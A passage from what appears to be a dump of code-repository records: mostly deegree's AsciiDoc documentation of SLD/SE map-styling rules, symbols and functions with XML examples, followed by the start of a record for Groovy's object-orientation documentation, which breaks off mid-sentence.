xmlns=\"http:\/\/www.opengis.net\/se\"\n xmlns:app=\"http:\/\/www.deegree.org\/app\"\n xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\"\n xmlns:sed=\"http:\/\/www.deegree.org\/se\"\n xmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <Name>Municipalities<\/Name>\n <Rule>\n <Name>Municipalities<\/Name>\n <Description>\n <Title>Municipalities<\/Title>\n <\/Description>\n <MaxScaleDenominator>200000<\/MaxScaleDenominator>\n <TextSymbolizer>\n <Label>\n <ogc:PropertyName>app:NAME<\/ogc:PropertyName>\n <\/Label>\n <Font>\n <SvgParameter name=\"font-family\">Arial<\/SvgParameter>\n <SvgParameter name=\"font-family\">Sans-Serif<\/SvgParameter>\n <SvgParameter name=\"font-weight\">bold<\/SvgParameter>\n <SvgParameter name=\"font-size\">12<\/SvgParameter>\n <\/Font>\n <Halo>\n <Radius>1<\/Radius>\n <Fill>\n <SvgParameter name=\"fill-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"fill\">#fefdC3<\/SvgParameter>\n <\/Fill>\n <\/Halo>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n <\/Fill>\n <\/TextSymbolizer>\n <\/Rule>\n<\/FeatureTypeStyle>\n----\n\n=== SLD\/SE clarifications\n\nThis chapter is meant to clarify deegree's behaviour when using standard\nSLD\/SE constructs.\n\n==== Perpendicular offset\/polygon orientation\n\nFor polygon rendering, the orientation is always fixed, and will be\ncorrected if a feature store yields inconsistent geometries. The outer\nring is always oriented counter clockwise, inner rings are oriented\nclockwise.\n\nA positive perpendicular offset setting results in an offset movement in\nthe outer direction, a negative setting moves the offset into the\ninterior. For inner rings the effect is flipped (a positive setting\nmoves into the interior of the inner ring, a negative setting moves into\nthe exterior of the inner ring).\n\n==== ScaleDenominators\n\nThe use of MinScaleDenominators and MaxScaleDenominators within SLD\/SE\nfiles can easily be misunderstood because of the meaning of a high or a\nlow scale. Therefore, this is clarified here according to the standard.\nIn general the MinScaleDenominator is always a smaller number than the\nMaxScaleDenominator. The following example explains, how it works:\n\n[source,xml]\n----\n<MinScaleDenominator>25000<\/MinScaleDenominator>\n<MaxScaleDenominator>50000<\/MaxScaleDenominator>\n----\n\nThis means, that the Symbolizer is being used for scales between 1:25000\nand 1:50000.\n\n=== deegree specific extensions\n\ndeegree supports some extensions of SLD\/SE and filter encoding to enable\nmore sophisticated styling. The following sections describe the\nrespective extensions for SLD\/SE and filter encoding. For several\nspecific extensions, there is a deegree SE XML\nhttp:\/\/schemas.deegree.org\/se[Schema].\n\n==== SLD\/SE extensions\n\n===== Use of alternative Symbols within the WellKnownName\n\nThe SLD\/SE specification defines a list of standard symbols, which are `circle`,\n`triangle`, `star`, `square` and `x`.\nIn addition to these standard symbols, other predefined and freely configurable\nsymbols are also available. These are described in the following chapters.\n\nFor reference each symbol is shown with the following style.\n[source,xml]\n----\n<Fill>\n <SvgParameter name=\"fill\">#FF0000<\/SvgParameter>\n <SvgParameter name=\"fill-opacity\">0.4<\/SvgParameter>\n<\/Fill>\n<Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n<\/Stroke>\n----\n\n====== Predefined symbols\n\n[cols=\"3\"]\n.Standard Symbold defined by SLD\/SE specification\n|===\na| image:se_wkn\/circle.png[] `circle`\na| image:se_wkn\/triangle.png[] `triangle`\na| image:se_wkn\/star.png[] `star`\na| image:se_wkn\/square.png[] `square`\na| image:se_wkn\/x.png[] `x`\n|\n|===\n\n[cols=\"3\"]\n.Extended Symbols `shape:\/\/`\n|===\na| image:se_wkn\/shape_backslash.png[] `shape:\/\/backslash`\na| image:se_wkn\/shape_carrow.png[] `shape:\/\/carrow`\na| image:se_wkn\/shape_ccarrow.png[] `shape:\/\/ccarrow`\n\na| image:se_wkn\/shape_coarrow.png[] `shape:\/\/coarrow`\na| image:se_wkn\/shape_dot.png[] `shape:\/\/dot`\na| image:se_wkn\/shape_horline.png[] `shape:\/\/horline`\n\na| image:se_wkn\/shape_oarrow.png[] `shape:\/\/oarrow`\na| image:se_wkn\/shape_plus.png[] `shape:\/\/plus`\na| image:se_wkn\/shape_slash.png[] `shape:\/\/slash`\n\na| image:se_wkn\/shape_times.png[] `shape:\/\/times`\na| image:se_wkn\/shape_vertline.png[] `shape:\/\/vertline`\n|\n|===\n\n[cols=\"30,30,40\"]\n.Extended Symbols `extshape:\/\/`\n|===\na| image:se_wkn\/extshape_arrow.png[] `extshape:\/\/arrow`\na| image:se_wkn\/extshape_emicircle.png[] `extshape:\/\/emicircle`\na| image:se_wkn\/extshape_narrow.png[] `extshape:\/\/narrow`\n\na| image:se_wkn\/extshape_sarrow.png[] `extshape:\/\/sarrow`\na| image:se_wkn\/extshape_triangle.png[] `extshape:\/\/triangle`\na| image:se_wkn\/extshape_triangleemicircle.png[] `extshape:\/\/triangleemicircle`\n|===\n\n[cols=\"3\"]\n.Extended Symbols `qgis:\/\/`\n|===\na| image:se_wkn\/qgis_arrow.png[] `qgis:\/\/arrow`\na| image:se_wkn\/qgis_arrowhead.png[] `qgis:\/\/arrowhead`\na| image:se_wkn\/qgis_circle.png[] `qgis:\/\/circle`\n\na| image:se_wkn\/qgis_cross.png[] `qgis:\/\/cross`\na| image:se_wkn\/qgis_cross2.png[] `qgis:\/\/cross2`\na| image:se_wkn\/qgis_crossfill.png[] `qgis:\/\/crossfill`\n\na| image:se_wkn\/qgis_diagonalhalfsquare.png[] `qgis:\/\/diagonalhalfsquare`\na| image:se_wkn\/qgis_diamond.png[] `qgis:\/\/diamond`\na| image:se_wkn\/qgis_equilateral_triangle.png[] `qgis:\/\/equilateral_triangle`\n\na| image:se_wkn\/qgis_filled_arrowhead.png[] `qgis:\/\/filled_arrowhead`\na| image:se_wkn\/qgis_halfsquare.png[] `qgis:\/\/halfsquare`\na| image:se_wkn\/qgis_hexagon.png[] `qgis:\/\/hexagon`\n\na| image:se_wkn\/qgis_lefthalftriangle.png[] `qgis:\/\/lefthalftriangle`\na| image:se_wkn\/qgis_line.png[] `qgis:\/\/line`\na| image:se_wkn\/qgis_pentagon.png[] `qgis:\/\/pentagon`\n\na| image:se_wkn\/qgis_quartercircle.png[] `qgis:\/\/quartercircle`\na| image:se_wkn\/qgis_quartersquare.png[] `qgis:\/\/quartersquare`\na| image:se_wkn\/qgis_rectangle.png[] `qgis:\/\/rectangle`\n\na| image:se_wkn\/qgis_regular_star.png[] `qgis:\/\/regular_star`\na| image:se_wkn\/qgis_righthalftriangle.png[] `qgis:\/\/righthalftriangle`\na| image:se_wkn\/qgis_semicircle.png[] `qgis:\/\/semicircle`\n\na| image:se_wkn\/qgis_star.png[] `qgis:\/\/star`\na| image:se_wkn\/qgis_thirdcircle.png[] `qgis:\/\/thirdcircle`\na| image:se_wkn\/qgis_triangle.png[] `qgis:\/\/triangle`\n|===\n\n====== Custom arrow with extshape:\/\/arrow\n\nThe symbol `extshape:\/\/arrow` can be adapted to your own needs with three optional parameters which are:\n\n * `t`: thickness of the arrow base, in a value range between 0 and 1 with a standard of 0.2\n * `hr`: height over width ratio, in a value range between 0 and 1000 with a standard of 2\n * `ab`: arrow head base ration, in a value range between 0 and 1 with a standard of 0.5\n\n.Example of `extshape:\/\/arrow` which varies `ab` between `0.1` and `1.0`\nimage::se_wkn_example\/extshape_arrow_ab_01_10.png[]\n.Example of `extshape:\/\/arrow` which varies `hr` between `0.2` and `2.0`\nimage::se_wkn_example\/extshape_arrow_hr_02_20.png[]\n.Example of `extshape:\/\/arrow` which varies `t` between `0.1` and `1.0`\nimage::se_wkn_example\/extshape_arrow_t_00_10.png[]\n\n.Example\n[source,xml]\n----\n<WellKnownName>extshape:\/\/arrow?t=0.2&hr=2&ab=0.5<\/WellKnownName>\n----\n\n====== Custom Symbol from SVG path svg:\/\/\n\nIt is also possible to define a symbol from a SVG path data.\nThe syntax of SVG path data is described at https:\/\/www.w3.org\/TR\/SVG\/paths.html#PathData\n\n.Example of custom symbol with \\`svgpath:\/\/`\n[cols=\"10,90\"]\n|===\na|image::se_wkn_example\/svgpath_example.png[]\na|`svgpath:\/\/m 8,14 0,-6 h -4.5 c 0,0 0,-7.5 6.6,-7.5 6,0 6.5,7.5 6.6,7.5 l -4.5,0 0,6 z m -4,0 v -2 h 2 v 2 z`\n|===\n\n====== Use Symbol from character code ttf:\/\/\n\nAlso TrueType font files can be used as source for symbols.\nFor TrueType fonts installed at System or Java level the syntax is `ttf:\/\/Font Name#code`.\nIf the font is not installed but available it can be sepcified\nabsolute or relative as `ttf:\/\/font.ttf#code`.\n\nThe character code has to be specified in hexadecimal notation prefixed with `0x`, `U+` or `\\u`.\n\n.Example of `ttf:\/\/` symbols\n[cols=\"10,30,10,50\"]\n|===\na| image::se_wkn_example\/ttf_lucida_sans.png[]\na| `ttf:\/\/Lucida Sans#0x21BB` +\n`ttf:\/\/Lucida Sans#U+21BB` +\n`ttf:\/\/Lucida Sans#\\u21bb`\na| image::se_wkn_example\/ttf_fontawesome_external.png[]\na| `ttf:\/\/..\/fontawesome-webfont.ttf#0xf13d`\n|===\n\nTIP: The character code for fonts installed at System level can be looked up\nvia the system Character Map application.\n\n====== Spacing around the symbol\n\nFor each symbol except the symbols `circle`,\n`triangle`, `star`, `square` and `x` can be defined with an explicit bound.\nThis is particularly useful if you want to display an area fill with a symbol.\n\nThis explicit limit can be specified either as width and height or as the\nlower left and upper right corner.\n\nThe syntax is: `wellknownname[width,height]` or `wellknownname[mix,miny,maxx,maxy]`\n\n[cols=\"10,40,10,40\"]\n|===\na| image:se_wkn_example\/qgis_circle_hatch_default.png[]\na| Regular symbol `qgis:\/\/circle`\na| image:se_wkn_example\/qgis_circle_hatch_bounded.png[]\na| Symbol with explicit bounds `qgis:\/\/circle[-1,-1,3,2]`\n|===\n\nTIP: The width and height must be entered in the coordinate system of the symbol.\nMost symbols are defined around the zero point with a width of 1.0.\nAccordingly it is recommended to start with the values `[1,1]` or `[-0.5,-0.5,0.5,0.5]`.\n\n===== Simplified hatches\n\nTo make hatching configuration easier, a new function `HatchingDistance` has been added,\nwhich allows the user to define the size by specifying hatching angle and desired line spacing.\n\nThe first parameter is the hatching angle, the second is the line spacing in the unit of the symboliser.\n\n.Example hatches\n[cols=\"10a,15,25,10a,15,25\",options=\"header\"]\n|===\n| | Rotation | WellKnownName | | Rotation | WellKnownName\n| image:se_wkn_example\/hatch_slash.png[] | 0 | `shape:\/\/slash`\n| image:se_wkn_example\/hatch_backslash.png[] | 0 | `shape:\/\/backslash`\n| image:se_wkn_example\/hatch_times.png[] | 0 | `shape:\/\/times`\n| image:se_wkn_example\/hatch_10deg.png[] | 10 | `shape:\/\/vertline`\n|===\n.Symbolizer used in previous example\n[source,xml]\n----\n<!-- PolygonSymbolizer for outline omitted -->\n<PolygonSymbolizer uom=\"http:\/\/www.opengeospatial.org\/se\/units\/pixel\" xmlns=\"http:\/\/www.opengis.net\/se\">\n <Fill>\n <GraphicFill>\n <Graphic>\n <Mark>\n <WellKnownName>shape:\/\/slash<\/WellKnownName>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n <SvgParameter name=\"stroke-linecap\">butt<\/SvgParameter>\n <\/Stroke>\n <\/Mark>\n <Size>\n <ogc:Function name=\"HatchingDistance\">\n <ogc:Literal>45<\/ogc:Literal>\n <ogc:Literal>10<\/ogc:Literal>\n <\/ogc:Function>\n <\/Size>\n <Rotation>0<\/Rotation>\n <\/Graphic>\n <\/GraphicFill>\n <\/Fill>\n<\/PolygonSymbolizer>\n----\nTIP: For of the shelf hates, which will create nice results, use the mark symbol `shape:\/\/slash`, `shape:\/\/backslash`\nor `shape:\/\/times` for 45\u00b0, `shape:\/\/horline` for 0\u00b0 and `shape:\/\/vertline` for 90\u00b0 hatches.\nFor hatching with user-defined angles it is recommended to use `shape:\/\/vertline`.\n\nTIP: With user-defined distances or angles that are not divisible by 45, rounding inaccuracies may occur and become\nvisible in the results depending on the used styles.\n\nTIP: To get an even hatching we recommend to set the parameter `stroke-linecap` to `butt`.\nThis is especially recommended for transparent hatches\n\n===== Use of TTF files as Mark symbols\n\nYou can use TrueType font files to use custom vector symbols in a\n_Mark_ element:\n\n[source,xml]\n----\n<Mark>\n <OnlineResource xlink:href=\"filepath\/yousans.ttf\" \/>\n <Format>ttf<\/Format>\n <MarkIndex>99<\/MarkIndex>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n ...\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke-opacity\">0<\/SvgParameter>\n ...\n <\/Stroke>\n<\/Mark>\n----\n\nTo find out what index you need to access, have a look at this\nhttp:\/\/osgeo-org.1560.n6.nabble.com\/SE-Styling-MarkIndex-glyph-index-tt5022210.html#a5026571[post]\non the mailinglist which explains it very well.\n\n===== Label AutoPlacement\n\ndeegree has an option for SE LabelPlacement to automatically place\nlabels on the map. To enable AutoPlacement, you can simply set the\n\"auto\" attribute to \"true\".\n\n[source,xml]\n----\n<LabelPlacement>\n <PointPlacement auto=\"true\">\n <Displacement>\n <DisplacementX>0<\/DisplacementX>\n <DisplacementY>0<\/DisplacementY>\n <\/Displacement>\n <Rotation>0<\/Rotation>\n <\/PointPlacement>\n<\/LabelPlacement> \n----\n\nTIP: AutoPlacement for labels only works for PointPlacement. AutoPlacement\nfor LinePlacement is not implemented yet.\n\n===== LinePlacement extensions\n\nThere are additional deegree specific LinePlacement parameters available\nto enable more sophisticated text rendering along lines:\n\n[width=\"100%\",cols=\"23%,11%,8%,58%\",options=\"header\",]\n|===\n|Option |Value |Default |Description\n|PreventUpsideDown |Boolean |false |Avoids upside down placement of text\n\n|Center |Boolean |false |Places the text in the center of the line\n\n|WordWise |Boolean |true |Tries to place individual words instead of\nindividual characters\n|===\n\n[source,xml]\n----\n<LinePlacement>\n <IsRepeated>false<\/IsRepeated>\n <InitialGap>10<\/InitialGap>\n <PreventUpsideDown>true<\/PreventUpsideDown>\n <Center>true<\/Center>\n <WordWise>false<\/WordWise>\n<\/LinePlacement>\n----\n\n===== ExternalGraphic extensions\n\ndeegree extends the OnlineResource element of ExternalGraphics to\nsupport ogc:Expressions as child elements. Example:\n\n[source,xml]\n----\n<ExternalGraphic>\n <OnlineResource>\n <ogc:PropertyName>app:icon<\/ogc:PropertyName>\n <\/OnlineResource>\n <Format>image\/svg<\/Format>\n<\/ExternalGraphic> \n----\n\n===== GraphicStroke extensions\n\nBy default, a _GraphicStroke_ is drawn repeatedly, but it can also be\nonly drawn once if the parameter `deegree-graphicstroke-position-percentage`\nis defined as a percentage of the line length.\nThe parameter `deegree-graphicstroke-rotation` controls whether the\n_Graphic_ is rotated to follow the angle of the current line segment\nor not, values larger than zero enables this. If not specified the\n_Graphic_ will follow the angle of the line.\n\n*Rendering of Mark along a geometry*\n\nWhen deegree renders strokes with _Mark_ it will use the _Fill_ and\n_Stroke_ which are defined as sub elements of _Mark_ instead of the\nparameter for `color`, `line-width` and `opacity` of _Stroke_.\nFor _Mark_ whose _Fill_ or _Stroke_ should be omitted, this can be\nrealized by setting `...-opacity` to zero. Example:\n\n[source,xml]\n----\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <Mark>\n <WellKnownName>triangle<\/WellKnownName>\n <Fill>\n <SvgParameter name=\"fill-opacity\">0<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke-opacity\">0<\/SvgParameter>\n <\/Stroke>\n <\/Mark>\n <Size>20<\/Size>\n <\/Graphic>\n <\/GraphicStroke>\n <SvgParameter name=\"deegree-graphicstroke-position-percentage\">50<\/SvgParameter>\n <SvgParameter name=\"deegree-graphicstroke-rotation\">0<\/SvgParameter>\n<\/Stroke>\n----\n\nNOTE: A typical usage is to draw an arrowhead on a line. This can be\nachieved by using a filled `triangle` _Mark_ which is rotated 90 degrees\nto the left (`-90`) with an anchor point of `0.75` \/ `0.5` and\n`deegree-graphicstroke-position-percentage` of `0` for the beginning\nof a line. To draw it at the end of a line, the _Mark_ has to be rotated\n90 degrees to the right (`90`) with an anchor point of `0.25` \/ `0.5`\nand `deegree-graphicstroke-position-percentage` of `100`.\n\n*Rendering of images or SVGs along a geometry*\n\nBoth images and SVG can be drawn along a geometry, but it should be\nnoted that these are best suited for signatures that are drawn only\nonce or with some gap.\nExample of a single SVG at the middle of the line:\n\n[source,xml]\n----\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <ExternalGraphic>\n <OnlineResource xlink:href=\".\/sample.svg\" \/>\n <Format>svg<\/Format>\n <\/ExternalGraphic>\n <Size>20<\/Size>\n <\/Graphic>\n <\/GraphicStroke>\n <SvgParameter name=\"deegree-graphicstroke-position-percentage\">50<\/SvgParameter>\n<\/Stroke>\n----\n\n*Rendering of SVGs as Mark*\n\nTo draw only the outline or fill of an SVG with a single color, an SVG\ncan be used as a `Mark`. Example:\n\n[source,xml]\n----\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <Mark>\n <OnlineResource xlink:href=\".\/sample.svg\" \/>\n <Format>svg<\/Format>\n <Fill>\n <SvgParameter name=\"fill\">#FF0000<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke-opacity\">0.0<\/SvgParameter>\n <\/Stroke>\n <\/Mark>\n <Size>20<\/Size>\n <\/Graphic>\n <\/GraphicStroke>\n<\/Stroke>\n----\n\nNOTE: Previous versions would have rendered SVG defined in an\n`Graphic`\/`ExternalGraphic`\/`OnlineResource` like the `Mark` example above.\nThese have either their configuration converted to\n`Graphic`\/`Mark`\/`OnlineResource` or the option to not render SVGs like\nimages has to be set for the instance, see <<anchor-appendix>> for details.\n\n==== SE & FE Functions\n\nThere are a couple of deegree specific functions which can be expressed\nas standard OGC function expressions in SLD\/SE. Additionally deegree has\nsupport for all the unctions defined within the SE standard.\n\n===== FormatNumber\n\nThis function is needed to format number attributes. It can be used like\nin the following example:\n\n[source,xml]\n----\n<FormatNumber xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <NumericValue>\n <ogc:PropertyName>app:SHAPE_LEN<\/ogc:PropertyName>\n <\/NumericValue>\n <Pattern>############.00<\/Pattern>\n<\/FormatNumber>\n----\n\n===== FormatDate\n\nThis function is fully supported, although not fully tested with all\navailable schema types mentioned in the spec.\n\n[source,xml]\n----\n<FormatDate xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <DateValue>\n <ogc:PropertyName>app:TIMESTAMP<\/ogc:PropertyName>\n <\/DateValue>\n <Pattern>DD<\/Pattern>\n<\/FormatDate>\n----\n\n===== ChangeCase\n\nThis function is used to change the case of property values.\n\n[source,xml]\n----\n<ChangeCase xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\" direction=\"toUpper\">\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n<\/ChangeCase>\n----\n\n===== Concatenate\n\nWith the concatenate function it is possible to merge the values of more\nthan one property to a chain.\n\n[source,xml]\n----\n<Concatenate xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <StringValue>\n <ogc:PropertyName>app:text1<\/ogc:PropertyName>\n <\/StringValue>\n <StringValue>\n <ogc:PropertyName>app:text2<\/ogc:PropertyName>\n <\/StringValue>\n <StringValue>\n <ogc:PropertyName>app:text3<\/ogc:PropertyName>\n <\/StringValue>\n<\/Concatenate>\n----\n\n===== Trim\n\nThe trim function is used to trim string property values.\n\n[source,xml]\n----\n<Trim xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\" stripOffPosition=\"both\">\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n<\/Trim>\n----\n\n===== StringLength\n\nWith the StringLength function it is possible to calculate the length of\nstring property values.\n\n[source,xml]\n----\n<StringLength xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n<\/StringLength>\n----\n\n===== Substring\n\nWith the substring function it is possible to only get a specific\nsubstring of a string property.\n\n[source,xml]\n----\n<Substring xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n <Position>1<\/Position>\n <Length>\n <ogc:Sub>\n <StringPosition fallbackValue=\"\" searchDirection=\"frontToBack\">\n <LookupString>-<\/LookupString>\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n <\/StringPosition>\n <ogc:Literal>1<\/ogc:Literal>\n <\/ogc:Sub>\n <\/Length>\n<\/Substring>\n----\n\n===== StringPosition\n\nThe StringPosition function is made to get the literal at a specific\nposition from a string property.\n\n[source,xml]\n----\n<StringPosition xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\" searchDirection=\"frontToBack\">\n <LookupString>-<\/LookupString>\n <StringValue>\n <ogc:PropertyName xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\">app:text<\/ogc:PropertyName>\n <\/StringValue>\n<\/StringPosition>\n----\n\n===== Categorize, Interpolate, Recode\n\nThese functions can operate both on alphanumeric properties of features\nand on raster data. For color values we extended the syntax a bit to\nallow for an alpha channel: #99ff0000 is a red value with an alpha value\nof 0x99. This allows the user to create eg. an interpolation from\ncompletely transparent to a completely opaque color value. To work on\nraster data you'll have to replace the PropertyName values with\nRasterdata.\n\nFor Interpolate only linear interpolation is currently supported.\n\n[source,xml]\n----\n<Categorize xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" fallbackValue=\"#fefdC3\">\n <LookupValue>\n <ogc:PropertyName>app:POP2000<\/ogc:PropertyName>\n <\/LookupValue>\n <Value>#FFE9D8<\/Value>\n <Threshold>1000<\/Threshold>\n <Value>#FBCFAC<\/Value>\n <Threshold>10000<\/Threshold>\n <Value>#FAAC6F<\/Value>\n <Threshold>25000<\/Threshold>\n <Value>#FD913D<\/Value>\n <Threshold>100000<\/Threshold>\n <Value>#FF7000<\/Value>\n<\/Categorize>\n----\n\n[source,xml]\n----\n<Interpolate xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"#005C29\" method=\"color\">\n <LookupValue>\n <ogc:PropertyName>app:CODE<\/ogc:PropertyName>\n <\/LookupValue>\n <InterpolationPoint>\n <Data>-1<\/Data>\n <Value>#005C29<\/Value>\n <\/InterpolationPoint>\n <InterpolationPoint>\n <Data>100<\/Data>\n <Value>#067A3A<\/Value>\n <\/InterpolationPoint>\n <InterpolationPoint>\n <Data>300<\/Data>\n <Value>#03A64C<\/Value>\n <\/InterpolationPoint>\n <InterpolationPoint>\n <Data>500<\/Data>\n <Value>#00CF5D<\/Value>\n <\/InterpolationPoint>\n <InterpolationPoint>\n <Data>1000<\/Data>\n <Value>#ffffff<\/Value>\n <\/InterpolationPoint>\n<\/Interpolate>\n----\n\n[source,xml]\n----\n<Recode xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <LookupValue>\n<ogc:PropertyName>app:code<\/ogc:PropertyName>\n <\/LookupValue>\n <MapItem>\n <Data>1000<\/Data>\n <Value>water<\/Value>\n <\/MapItem>\n <MapItem>\n <Data>2000<\/Data>\n <Value>nuclear<\/Value>\n <\/MapItem>\n <MapItem>\n <Data>3000<\/Data>\n <Value>solar<\/Value>\n <\/MapItem>\n <MapItem>\n <Data>4000<\/Data>\n <Value>wind<\/Value>\n <\/MapItem>\n<\/Recode>\n----\n\n===== General XPath functions\n\nMany useful things can be done by simply using standard XPath 1.0\nfunctions in PropertyName elements.\n\nAccess the (local) name of an element (e.g. the name of a referenced\nfeature \/ subfeature).\n\n[source,xml]\n----\n<PropertyName xmlns:app=\"http:\/\/www.deegree.org\/app\">app:subfeature\/*\/local-name()<\/PropertyName>\n----\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"50f49f569001f23ebdee4d3c8f539e9c4ead5c38","subject":"clarify documentation around properties (closes #642)","message":"clarify documentation around properties (closes #642)\n","repos":"jwagenleitner\/incubator-groovy,jwagenleitner\/groovy,russel\/groovy,paulk-asert\/incubator-groovy,armsargis\/groovy,traneHead\/groovy-core,paulk-asert\/incubator-groovy,apache\/groovy,paulk-asert\/incubator-groovy,shils\/incubator-groovy,apache\/incubator-groovy,jwagenleitner\/incubator-groovy,russel\/groovy,jwagenleitner\/incubator-groovy,traneHead\/groovy-core,russel\/incubator-groovy,shils\/incubator-groovy,apache\/groovy,shils\/incubator-groovy,paulk-asert\/groovy,paulk-asert\/groovy,russel\/incubator-groovy,armsargis\/groovy,shils\/groovy,shils\/incubator-groovy,jwagenleitner\/incubator-groovy,russel\/groovy,paulk-asert\/incubator-groovy,shils\/groovy,paulk-asert\/groovy,apache\/incubator-groovy,apache\/groovy,russel\/groovy,paulk-asert\/groovy,russel\/incubator-groovy,jwagenleitner\/groovy,apache\/incubator-groovy,paulk-asert\/incubator-groovy,jwagenleitner\/groovy,traneHead\/groovy-core,shils\/groovy,russel\/incubator-groovy,apache\/incubator-groovy,armsargis\/groovy,apache\/groovy,traneHead\/groovy-core,jwagenleitner\/groovy,shils\/groovy,armsargis\/groovy","old_file":"src\/spec\/doc\/core-object-orientation.adoc","new_file":"src\/spec\/doc\/core-object-orientation.adoc","new_contents":"\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n Licensed to the Apache Software Foundation (ASF) under one\n or more contributor license agreements. See the NOTICE file\n distributed with this work for additional information\n regarding copyright ownership. The ASF licenses this file\n to you under the Apache License, Version 2.0 (the\n \"License\"); you may not use this file except in compliance\n with the License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing,\n software distributed under the License is distributed on an\n \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n KIND, either express or implied. See the License for the\n specific language governing permissions and limitations\n under the License.\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n= Object orientation\n:jls: http:\/\/docs.oracle.com\/javase\/specs\/jls\/se8\/html\/\n\nThis chapter covers the object orientation of the Groovy programming language.\n\n== Types\n\n=== Primitive types\n\nGroovy supports the same primitive types as those defined by the {jls}[Java Language Specification]:\n\n* integral types: `byte` (8 bit), `short` (16 bit), `int` (32 bit) and `long` (64 bit)\n* floating-point types: `float` (32 bit) and `double` (64 bit)\n* `boolean` type (exactly `true` or `false`)\n* `char` type (16 bit, usable as a numeric type, representing an UTF-16 code)\n\nWhile Groovy declares and stores primitive fields and variables as primitives, because it uses Objects for\neverything, it autowraps references to primitives. Just like Java, the wrappers it uses are\n\n[cols=\"1,1\" options=\"header\"]\n.primitive wrappers\n|====\n| Primitive type\n| Wrapper class\n\n| boolean\n| Boolean\n\n| char\n| Character\n\n| short\n| Short\n\n| int\n| Integer\n\n| long\n| Long\n\n| float\n| Float\n\n| double\n| Double\n|====\n\nHere's an example using `int`\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/PrimitiveTest.groovy[tags=primitive_references,indent=0]\n----\n\nNow you may be concerned that this means every time you use a mathematical operator on a reference to a primitive\nthat you'll incur the cost of unboxing and reboxing the primitive. But this is not the case, as Groovy will compile\nyour operators into their link:core-operators.html#_operator-overloading[method equivalents] and uses those instead.\nAdditionally, Groovy will automatically unbox to a primitive when calling a Java method that takes a primitive\nparameter and automatically box primitive method return values from Java. However, be aware there are some\nlink:core-differences-java.html#_primitives_and_wrappers[differences] from Java's method resolution.\n\n=== Class\n\nGroovy classes are very similar to Java classes, and are compatible with Java ones at JVM level.\nThey may have methods, fields and properties (think JavaBean properties but with less boilerplate).\nClasses and class members can have the same modifiers (public, protected, private, static, etc) as in Java\nwith some minor differences at the source level which are explained shortly.\n\nThe key differences between Groovy classes and their Java counterparts are:\n\n* Classes or methods with no visibility 